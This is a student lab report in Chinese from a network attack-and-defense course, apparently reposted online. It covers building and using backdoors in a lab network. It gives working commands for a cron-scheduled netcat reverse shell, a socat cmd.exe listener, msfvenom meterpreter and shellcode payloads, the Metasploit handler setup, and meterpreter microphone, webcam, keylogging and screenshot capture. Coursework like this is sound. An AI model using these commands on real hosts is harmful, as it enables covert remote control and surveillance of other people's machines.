1. 程式人生 > 其它 >20192418 2021-2022-2 《網路與系統攻防技術》實驗二實驗報告

20192418 2021-2022-2 《網路與系統攻防技術》實驗二實驗報告

1.實驗內容

(1)使用netcat獲取主機操作Shell,cron啟動某項任務(任務自定)

PS:cron是linux下用來週期性的執行某種任務或等待處理某些事件的一個守護程序

(2)使用socat獲取主機操作Shell, 任務計劃啟動

(3)使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell

(4)使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權

(5)使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。

2.實驗過程

一、使用netcat獲取主機操作Shell,cron啟動

  1. 檢視kali和主機的ip地址:
  • 這是主機的ip地址:

  • 這是kali的ip地址:

  1. Win10主機使用ncat程式監聽本機的1221埠(埠可以隨機,這裡隨便輸入為1221)
  1. kali虛擬機器netcat連線Win10主機,反彈shell後,成功getshell
  1. cron啟動
  • crontab -e指令
  • 5 * * * * nc 192.168.211.1 1221 -e /bin/sh指令:每個小時的第5分鐘,反向連線Windows主機1221埠

時間到了,getshell:

二、使用socat獲取主機操作Shell, 任務計劃啟動

  1. 在任務計劃程式中建立任務

進入管理介面之後點選建立任務

選擇觸發器——>新建,並將觸發器配置成下圖所示:

再點選操作——>新建,在程式或腳本里面找到socat路徑,在引數裡面填寫 tcp-listen:1221 exec:cmd.exe,pty,stderr。 把cmd.exe繫結到埠1221,同時把cmd的stderr重定向到stdout上。

按Win+L鎖定主機,再解鎖之後,可以發現之前建立的任務已經開始運行了:

  1. 通過kali連線Win10主機

輸入 socat - tcp:192.168.211.1:1221 指令連線Win10主機,getshell

三、使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell

  1. 使用 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=1221 -f exe > 20192418.exe指令生成後門。
  1. 在Win10中使用ncat -lv 1221 > 20192418.exe指令將被控制主機進入接受檔案模式
  1. 在kali中使用nc 192.168.72.1 1221 < 20192418.exe將後門傳輸過去
  1. 在kali上使用msfconsole指令進入msf控制檯
  1. 輸入指令進行連線
  • 輸入use exploit/multi/handler使用監聽模組,設定payload

  • 輸入set payload windows/meterpreter/reverse_tcp 設定載荷,基於TCP的反向連線反彈windows shell

  • 輸入 set LHOST 192.168.72.128 設定本主機IP

  • 輸入 set LPORT 1221 設定本主機埠

  • 輸入exploit,等待啟動後門程式

  1. Win10主機執行後門“20192418.exe”
  1. kali上getshell

四、使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權

  1. 使用record_mic指令可以截獲一段錄音音訊:
  1. 使用webcam_snap指令可以呼叫攝像頭進行拍照,效果如下:
  1. 使用 keyscan_start 指令記錄鍵盤輸入,使用 keyscan_dump 指令讀取擊鍵記錄
  1. 使用 screenshot 指令可以進行截圖

五、可選加分內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell

獲得主機shell:msfvenom -p linux/x86/reverse_tcp LHOST=192.168.72.128 LPORT=2418 -x ./pwn20192418 -f elf >20192418pwnshellcode

生成完payload之後,執行MSF(具體指令參考上一過程),再執行生成的20192418pwnshellcode檔案,就可以getshell了

3.問題及解決方案

  • 問題1:ncat後,在cmd輸入ls出現亂碼
  • 問題1解決方案:中文名稱的資料夾和檔案會亂碼
  • 問題2:傳送後門到win10主機失敗,0kb的檔案且不可開啟:

  • 問題2解決方案:直接使用檔案拖動功能把後門從linux拖動到win10主機後執行

  • 問題3:生成的20192418pwn檔案提示許可權不夠

  • 問題3解決方案:通過chmod +x 2012418pwn命令修改檔案許可權後即可執行

4.學習感悟、思考等

基礎問題回答:

  1. 例舉你能想到的一個後門進入到你係統中的可能方式?
    在非正規網站下載盜版軟體,後門與盜版軟體一併被下載。
  2. 例舉你知道的後門如何啟動起來(win及linux)的方式?
    後臺插入免殺程序,替換或感染系統檔案。
  3. Meterpreter有哪些給你印象深刻的功能?
    獲取密碼,下載登錄檔,獲取系統資訊等功能。
  4. 如何發現自己有系統有沒有被安裝後門?
  • 定期使用防毒軟體進行查殺;
  • 檢視主機上是否存在可疑程序。

感悟:

在本次實驗中,我學習到了後門的原理,學會了怎樣去製作後門和使用後門,還有MSF的使用。這次實驗的難度不大,但是在實驗過程中出現了很多各種各樣的小問題,但是都能自己逐個解決,通過實驗提高了自己的動手能力,本次實驗讓我受益匪淺。

參考資料